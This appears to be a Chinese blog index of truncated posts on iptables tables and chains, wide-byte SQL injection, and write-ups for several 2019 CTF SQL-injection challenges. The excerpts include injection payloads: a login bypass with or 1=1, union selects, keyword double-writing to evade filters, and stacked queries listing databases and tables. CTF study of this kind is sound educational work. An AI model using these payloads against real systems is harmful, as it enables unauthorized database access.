iptables是Linux中对网络数据包进行处理的一个功能组件。等同于防火墙,可以对经过的数据宝进行处理。 表 提供特定的功能,iptables中有4个表:filter表(数据包过滤),nat表(网络地址转换),mangle表(数据包重构)和raw表(数据追踪处理)。 链 是数据包传播的路径,每一个链其实就是众多规则中的一个检查清单,每一条链中可以有一条或数条规则。 规则 是iptabl...
什么是窄字节和宽字节呢? 当某字符的大小为一个字节时,称其字符为窄字节。 当某字符的大小为两个字节时,称其字符为宽字节。 宽字节注入适用于那种情况? 针对'和\的过滤 宽字节注入原理 所有英文默认占一个字节,汉字占两个字节 mysql在使用GBK编码时,会认为两个字符为一个汉字,例如%aa%5c就是一个汉字(前一个ascii码大于128才能到汉字的范围)。我们再过滤'的时候,往往...
[GXYCTF2019]BabySQli 界面就只有一个登录框 通过这个题学到了联合注入有个技巧: 在联合查询并不存在的数据时,联合查询就会构造一个虚拟的数据。 例如现在有一个表: 我们输入查询语句: SELECT * FROM `sc` where Sno= '201215121' union select 'admin','admin123','123456' 可以看出当不存在数据...
[极客大挑战 2019]BabySQL 首先尝试万能密码 admin admin' or 1=1# 失败 一般注入 admin admin' union select 1,2,3# 失败 这里只显示了1,2,3#,怀疑是过滤了union,select`等关键字,尝试双鞋绕过 双写绕过 admin admin' ununionion selselectect 1,2,3# o...
[强网杯 2019]随便注 这道题和前面那道差不多,也是堆叠注入 sqlmap是没有灵魂的 1';show databases;# 1';show tables;# 有两个表 1'; show columns from `1919810931114514`;# 1'; show columns from `words`;# 这里获取flag的操作比较骚,参考以为大佬的: 因为这...